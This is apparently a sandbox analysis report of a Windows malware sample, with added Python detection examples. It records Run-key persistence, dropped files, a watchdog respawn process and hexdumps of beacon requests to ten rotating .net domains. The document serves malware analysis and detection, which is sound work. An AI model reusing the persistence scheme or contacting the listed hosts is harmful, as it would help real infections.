Analysis Date: 2014-09-19 05:08:27

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: af7e9629524939de77a8339d91a89da5 sha1: 6b1885c5ca10c7d10b70b06162ba4c7762789cb4 size: 297984
Section .rdata md5: d5f9086296c36525602855461ad749df sha1: 4b18701655a3334fef9cba23525b6b51e73a5e79 size: 33792
Section (name not preserved in this report) md5: fac7905d72a33d234d228e6c483117fd sha1: 3ba61b091445bd10ceb232c1a2fcc06392c6cc49 size: 107520
Timestamp: 2014-07-24 04:47:37
Packer: Microsoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Center Office Accounts Bus Group Installer ➝ C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe

↳ C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.nulm3
Creates File: C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\mybbqyktp.exe
Creates File: \Device\Afd\Endpoint (the AFD socket device; the process opened a network socket)
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\rhbtxpcbvfdiijn\fezozjv.exe"
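
Read together, the three process entries describe a short install chain: C:\malware.exe writes fezozjv.exe into a randomly named directory under Application Data, points a HKCU Run value with an innocuous name (Center Office Accounts Bus Group Installer) at it, and executes it; the dropped copy writes two more files (fezozjv.nulm3 and mybbqyktp.exe), opens a socket (\Device\Afd\Endpoint) and starts a second instance of itself whose command line begins with the token WATCHDOGPROC rather than the image path, the usual shape of a guardian process that restarts the main one if it is killed (an interpretation; the report only shows the command line). The Python below is an added example, not part of the report or of the sample: it replays those events as a constructed event list and applies four checks a host-based detection would run over process, file and registry telemetry. The pid/ppid numbers, the event field names, the quoting of the child command line and the image path behind the WATCHDOGPROC launch are assumptions; the paths, the Run value name and the marker token are taken from the report.

```python
import ntpath
import re
from collections import defaultdict

# Constructed event stream mirroring the Runtime Details of the report. The
# pid/ppid numbers, the field names, the quoting of pid 2's command line and the
# image path behind the WATCHDOGPROC launch are assumptions for this example.
APPDATA = r"C:\Documents and Settings\Administrator\Application Data"
DROPPED = APPDATA + r"\rhbtxpcbvfdiijn\fezozjv.exe"
EVENTS = [
    {"type": "process", "pid": 1, "ppid": 0, "image": r"C:\malware.exe",
     "cmdline": r"C:\malware.exe"},
    {"type": "registry", "pid": 1,
     "key": r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run"
            r"\Center Office Accounts Bus Group Installer",
     "data": DROPPED},
    {"type": "file", "pid": 1, "path": DROPPED},
    {"type": "process", "pid": 2, "ppid": 1, "image": DROPPED, "cmdline": f'"{DROPPED}"'},
    {"type": "file", "pid": 2, "path": APPDATA + r"\rhbtxpcbvfdiijn\fezozjv.nulm3"},
    {"type": "file", "pid": 2, "path": APPDATA + r"\rhbtxpcbvfdiijn\mybbqyktp.exe"},
    {"type": "process", "pid": 3, "ppid": 2, "image": DROPPED,
     "cmdline": f'WATCHDOGPROC "{DROPPED}"'},
]

# Path fragments (lower-case) that mark user-writable locations and Run keys.
USER_WRITABLE = ("\\application data\\", "\\appdata\\", "\\local settings\\temp\\")
RUN_KEYS = ("\\currentversion\\run\\", "\\currentversion\\runonce\\")


def in_user_writable(path):
    p = path.lower()
    return any(marker in p for marker in USER_WRITABLE)


def looks_random(name):
    """Cheap check for a generated path component: letters only, and either
    vowel-starved or containing a long consonant run (rhbtxpcbvfdiijn passes,
    Administrator and Microsoft do not)."""
    if not name.isalpha() or len(name) < 7:
        return False
    low = name.lower()
    vowel_ratio = sum(c in "aeiou" for c in low) / len(low)
    longest_run = max((len(r) for r in re.findall(r"[^aeiou]+", low)), default=0)
    return vowel_ratio < 0.25 or longest_run >= 4


def argv0(cmdline):
    """First token of a Windows command line: a quoted path or up to the first space."""
    if cmdline.startswith('"'):
        return cmdline[1:].split('"', 1)[0]
    return cmdline.split(None, 1)[0]


def analyze(events):
    """Return (rule, pid, detail) findings for the four behaviours in the report."""
    findings = []
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    written = defaultdict(set)  # pid -> lower-case paths that process created
    for e in events:
        if e["type"] == "file":
            written[e["pid"]].add(e["path"].lower())
    seen_dirs = set()
    for e in events:
        if e["type"] == "registry":
            key = e["key"].lower()
            # (1) Run/RunOnce value pointing into a user-writable directory
            if any(k in key for k in RUN_KEYS) and in_user_writable(e["data"]):
                findings.append(("run_key_user_writable", e["pid"], e["data"]))
        elif e["type"] == "process":
            img = e["image"]
            parent = procs.get(e["ppid"])
            # (2) the parent wrote this image to a user-writable path, then ran it
            if img.lower() in written[e["ppid"]] and in_user_writable(img):
                findings.append(("drop_and_execute", e["ppid"], img))
            # (3) a copy of itself started with a marker token as argv[0]
            #     instead of the image path (the WATCHDOGPROC pattern)
            first = argv0(e["cmdline"])
            if (parent and parent["image"].lower() == img.lower()
                    and ntpath.basename(first).lower() != ntpath.basename(img).lower()):
                findings.append(("self_respawn_marker_arg", e["pid"], first))
        # (4) random-looking directory names in any path the event touches
        for path in (e.get("path"), e.get("image"), e.get("data")):
            for comp in (path or "").split("\\")[:-1]:
                if looks_random(comp) and comp not in seen_dirs:
                    seen_dirs.add(comp)
                    findings.append(("random_dirname", e["pid"], comp))
    return findings


if __name__ == "__main__":
    for rule, pid, detail in analyze(EVENTS):
        print(f"{rule:24} pid={pid} {detail}")
```

Each of the four checks fires on exactly one event of the constructed stream, and none of them needs the dropped file's hash: the Run value name and the directory name are generated per infection, so the detection keys on the shape of the behaviour (user-writable persistence, drop-then-execute, self-respawn with a marker token, vowel-starved directory names) rather than on the specific strings.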

Network Details:
DNS queries: 85 lookups, all Type: A (the queried names are not preserved in this report)
Flows: TCP 192.168.1.1:1031 through 192.168.1.1:1040 ➝ (10 connections; destinations not preserved in this report)

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20707265 73656e74 6265696e   ost: presentbein
0x00000070 (00112)   672e6e65 740d0a0d 0a                  g.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20636869 65666265 696e672e   ost: chiefbeing.
0x00000070 (00112)   6e65740d 0a0d0a0d 0a                  net......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20747765 6c766566 6f726576   ost: twelveforev
0x00000070 (00112)   65722e6e 65740d0a 0d0a                er.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20686973 746f7279 666f7265   ost: historyfore
0x00000070 (00112)   7665722e 6e65740d 0a0d0a              ver.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20776561 74686572 666f7265   ost: weatherfore
0x00000070 (00112)   7665722e 6e65740d 0a0d0a              ver.net....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20636c61 73736265 796f6e64   ost: classbeyond
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0d0a              .net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20746869 6e6b666c 6f776572   ost: thinkflower
0x00000070 (00112)   2e6e6574 0d0a0d0a 0a0d0a              .net.......

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20707265 73656e74 666c6f77   ost: presentflow
0x00000070 (00112)   65722e6e 65740d0a 0d0a0a              er.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20636f6c 6c656765 636f726e   ost: collegecorn
0x00000070 (00112)   65722e6e 65740d0a 0d0a0a              er.net.....

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d   ites.com&method=
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 206f6674 656e666c 6f776572   ost: oftenflower
0x00000070 (00112)   2e6e6574 0d0a0d0a 0d0a0a              .net.......
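
All ten captured requests are the same GET to /index.php with the same query string (email=sales@signbites.com&method=post), HTTP/1.0, Accept: */*, Connection: close and no User-Agent header; only the Host header changes, cycling through ten two-word .net names. The DNS section records 85 A lookups against 10 TCP flows, which fits a client walking a list of candidate names and talking to the ones that resolve (an inference from the counts, not something the report states). The Python below is an added example, not part of the sandbox report or of the sample: it decodes the report's own hexdump layout back into bytes, parses the request, and groups requests that share everything but the Host header, which is the property a network detection for this traffic should key on rather than the individual domains. The hexdumps of the first two requests are copied from above; the other eight hosts are rebuilt with a helper that reproduces the observed request shape, and one browser-style request to a reserved example domain is constructed to show that it does not join the group.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed samples: the first two requests from the Raw Pcap section, in the
# sandbox's hexdump layout. The second carries an extra CRLF after the headers
# (the trailing 0d0a), which the parser has to tolerate.
HEXDUMP_PRESENTBEING = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20707265 73656e74 6265696e   ost: presentbein
0x00000070 (00112)   672e6e65 740d0a0d 0a
"""
HEXDUMP_CHIEFBEING = """\
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d73616c 65734073 69676e62   mail=sales@signb
0x00000020 (00032)   69746573 2e636f6d 266d6574 686f643d
0x00000030 (00048)   706f7374 20485454 502f312e 300d0a41   post HTTP/1.0..A
0x00000040 (00064)   63636570 743a202a 2f2a0d0a 436f6e6e   ccept: */*..Conn
0x00000050 (00080)   65637469 6f6e3a20 636c6f73 650d0a48   ection: close..H
0x00000060 (00096)   6f73743a 20636869 65666265 696e672e   ost: chiefbeing.
0x00000070 (00112)   6e65740d 0a0d0a0d 0a                  net......
"""
# The remaining eight Host values seen in the capture.
OTHER_HOSTS = ["twelveforever.net", "historyforever.net", "weatherforever.net",
               "classbeyond.net", "thinkflower.net", "presentflower.net",
               "collegecorner.net", "oftenflower.net"]


def hexdump_to_bytes(dump):
    """Decode the sandbox layout (0x<offset> (<decimal>)   <4 groups of 8 hex>   <ascii>)
    back into bytes. Only the fixed-width hex field is trusted; the ASCII column,
    present or not, is ignored."""
    out = bytearray()
    for line in dump.splitlines():
        m = re.match(r"0x[0-9a-fA-F]+ \(\d+\) {3}(.{0,35})", line)
        if m:
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def build_request(host, email="sales@signbites.com"):
    """Reproduce the observed request shape for a given Host header."""
    return (f"GET /index.php?email={email}&method=post HTTP/1.0\r\n"
            "Accept: */*\r\nConnection: close\r\n"
            f"Host: {host}\r\n\r\n").encode("ascii")


def parse_http_request(raw):
    """Minimal HTTP/1.x request parser: request line, headers, query string."""
    head, _, _body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", errors="replace").split("\r\n")
    parts = lines[0].split(" ")
    method, target = parts[0], parts[1]
    version = parts[2] if len(parts) > 2 else ""
    headers = {}
    for h in lines[1:]:
        name, _, value = h.partition(":")
        headers[name.strip().lower()] = value.strip()
    url = urlsplit(target)
    return {"method": method, "path": url.path, "version": version,
            "query": {k: v[0] for k, v in parse_qs(url.query).items()},
            "host": headers.get("host", ""), "headers": headers}


def find_beacon_campaigns(requests, min_hosts=3):
    """Group requests identical in method, path, version, query string and
    User-Agent presence; report groups spread across >= min_hosts hosts."""
    groups = {}
    for r in requests:
        key = (r["method"], r["path"], r["version"],
               tuple(sorted(r["query"].items())), "user-agent" in r["headers"])
        groups.setdefault(key, set()).add(r["host"])
    return [{"method": m, "path": p, "version": v, "query": dict(q),
             "has_user_agent": ua, "hosts": sorted(hosts)}
            for (m, p, v, q, ua), hosts in groups.items() if len(hosts) >= min_hosts]


def sample_requests():
    raw = [hexdump_to_bytes(HEXDUMP_PRESENTBEING), hexdump_to_bytes(HEXDUMP_CHIEFBEING)]
    raw += [build_request(h) for h in OTHER_HOSTS]
    # Constructed browser-style request (User-Agent, HTTP/1.1): must not be grouped.
    raw.append(b"GET /index.php?email=sales@signbites.com&method=post HTTP/1.1\r\n"
               b"Host: example.com\r\nUser-Agent: Mozilla/5.0\r\nAccept: */*\r\n\r\n")
    return [parse_http_request(b) for b in raw]


if __name__ == "__main__":
    for c in find_beacon_campaigns(sample_requests()):
        print(c["path"], c["query"], "user-agent" if c["has_user_agent"] else "no user-agent")
        print("  hosts:", ", ".join(c["hosts"]))
```

The grouping key deliberately excludes the Host header and includes the absence of a User-Agent, because the domains are the part of this traffic that rotates while the request line, the HTTP/1.0 version and the bare header set stay fixed across all ten servers.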

Strings:
An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
 Base Class Descriptor at (
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
- CRT not initialized
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
dqy sji xncac engwob absp rhnogz lode cfojaderd jahbeevp ooobf irikxaibp psqos rnh qrcu hls bbbu knbijljoo afpjuuq qikneijj gdbo bejewipul jkqi gnnicpm pvzuqb sraiae fome rzmaz apb fbcee ivvs endbupm fjumijdbi cjnuceel fvs munbiplv lxvepu uedkpu bdyorca rtduulw nwdebwa bisciafnc dmj pomp heeblag ledfio mhsoxla lixjagwxun mvsasulbi glbu mbzivr jokzid scduin ubo srecerzev jape rid zcdudfjeiz blgo duajte wouvruxgb bdjokjpoi wpco ftl onelv bzlemn xgoudebfg rznocca jgseoc zzpel ausqsipq flfa iagbyu smje tfcasbgaj oalfes bhsucoi ksgavg pomfojbfib mjno enm afs sfatujtub ilfjiq vyobeioj pocvainct tbjijrde fof jclujwbe eota rznoativ aou jgzut ffujilj dxeba xpcuwkyivf blbeer wfo ueakp sblufndue offcon eupgnomdjo dvhafcmaqc lyqeld pitla xbl fgm clvego nglu gjinuo pzpe moeoxtim uumrlevwc dpsulgveb cjz ovbnelwpel clvebebo ymevazusnu gnucezvwix qtef vpdoeopb scgiscmijl spbih amu plnudqsedp zenko miyzelocpu ffjupvz fublufpsi fgtavsr ifdcuj omcsudcm saiw nmficj pugbosacfe poutjoyiit zucnonkma ecm hjbeaav lrgodpzota nmzegmj ryguqelwaf scmujrjavc paedru lgmoirp sflea kljagimej fld mbaayiml egpmag dnmanfudee czlicp szsiv aud gowitufwmi dlgogwg znop kmomefdomi jdgag vnsinz zaikb vpfi gupu ouili medyagzcu prjudml bgz ubctob ald blgucytus nclof npcaqfgar nbsopna folsug jkcugzuj bagrosya suafke phxasqhud bnneijua mvacomkp tvcua bsgovbane mjpo huzvilacgu pfmevduc xppaodm evncogaf usfluod mmpooi pmc gcfipedd fneeziaecv iecdpe tmgot grsecojfaz ngtaune emgmugpvec ibnwe tgidimhnuc eebi oofv nabya cddadoltas wphirkcumk gsxadmac sne fzliaaxp yccofel lvbo sdnibpna ljj fcg lfvogb ynp lcavajm owjp jxonezj kllo mcgipnja pbcacyuv yklosab doqpamcni cbk frufi ulbpomwzu vgb mvzi qacuvatif xnp csgefpu sbfin pjenu udcpol ppsoe pjcinpla tdkult yrvib tzreuw ekejsipcv tqciae mmsitjrall ujdveni hgda qjacujklel vzvaauos jjzedd ggkobydi jepgabgsi abtganspoa
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
